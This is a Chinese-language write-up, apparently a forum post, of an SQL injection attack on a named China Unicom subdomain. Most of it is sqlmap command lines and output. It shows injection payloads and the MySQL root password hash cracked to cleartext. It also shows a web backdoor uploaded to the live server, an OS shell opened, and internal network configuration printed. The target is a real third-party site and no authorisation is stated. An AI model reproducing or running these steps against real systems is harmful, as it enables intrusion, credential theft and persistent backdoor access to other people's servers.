联通某分站MySQL注入ROOT权限下载

联通某分站MySQL注入ROOT权限

PHP + MYSQL注入，ROOT权限，可获得SHELL，接下来能做啥大家都知道了。

在黑吧安全网看到这个漏洞 17WO手机验证码绕过可任意修改其他用户密码于是测试一下。漏洞依然存在，未修复。接着检查一下其他子域名的安全。

百度搜索“site:17wo.cn”一下，得到可能的注入点：http://card.17wo.cn/wap/wap_card.php?id=2548

扔给sqlmap跑一下：

./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password



    sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool

    http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] starting at 14:24:01



[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5

[14:24:01] [INFO] resuming back-end DBMS 'mysql'

[14:24:01] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=2548 AND 1953=1953



    Type: UNION query

    Title: MySQL UNION query (NULL) - 1 column

    Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=2548 AND SLEEP(5)

---

[14:24:02] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.4.4, PHP 5.5.3

back-end DBMS: MySQL 5.0.11

[14:24:02] [INFO] fetching database users password hashes

[14:24:02] [WARNING] reflective value(s) found and filtering out

[14:24:02] [INFO] the SQL query used returns 6 entries

[14:24:02] [INFO] starting 6 threads

[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"

[14:24:03] [INFO] retrieved: "",""

[14:24:03] [INFO] retrieved: "pma",""

[14:24:03] [INFO] retrieved: "",""

[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"

[14:24:03] [INFO] retrieved: "root",""

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N

do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y

[14:24:03] [INFO] using hash method 'mysql_passwd'

what dictionary do you want to use?

[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)

[2] custom dictionary file

[3] file with list of dictionary files

> 1

[14:24:03] [INFO] using default dictionary

do you want to use common password suffixes? (slow!) [y/N] N

[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)

[14:24:03] [INFO] starting 4 processes

[14:24:33] [INFO] cracked password 'wise' for user 'root'

database management system users password hashes:

[*] pma [1]:

    password hash: NULL

[*] root [2]:

    password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520

    clear-text password: wise

    password hash: NULL

直接跑出root密码。

执行个命令试试：

[14:26:46] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.4.4, PHP 5.5.3

back-end DBMS: MySQL 5.0.11

[14:26:46] [INFO] going to use a web backdoor for command prompt

[14:26:46] [INFO] fingerprinting the back-end DBMS operating system

[14:26:46] [WARNING] reflective value(s) found and filtering out

[14:26:46] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'

[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'

[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique

[14:26:47] [WARNING] unable to upload the file stager on '/'

[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique

[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query

[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4

[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique

[14:26:53] [WARNING] unable to upload the file stager on '/wap'

[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique

[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path

[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique

[14:27:03] [INFO] heuristics detected web page charset 'utf-8'

[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php

[14:27:06] [INFO] heuristics detected web page charset 'ascii'

[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php

[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> ipconfig

do you want to retrieve the command standard output? [Y/n/a] Y

[14:27:17] [INFO] heuristics detected web page charset 'GB2312'

command standard output:

---



Windows IP 配置





以太网适配器 本地连接:



   连接特定的 DNS 后缀 . . . . . . . :

   本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821

   IPv4 地址 . . . . . . . . . . . . : 10.123.176.75

   子网掩码  . . . . . . . . . . . . : 255.255.255.224

   默认网关. . . . . . . . . . . . . : 10.123.176.67



隧道适配器 本地连接* 4:



   连接特定的 DNS 后缀 . . . . . . . :

   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4

   本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4

   默认网关. . . . . . . . . . . . . : ::



隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:



   媒体状态  . . . . . . . . . . . . : 媒体已断开

   连接特定的 DNS 后缀 . . . . . . . :

---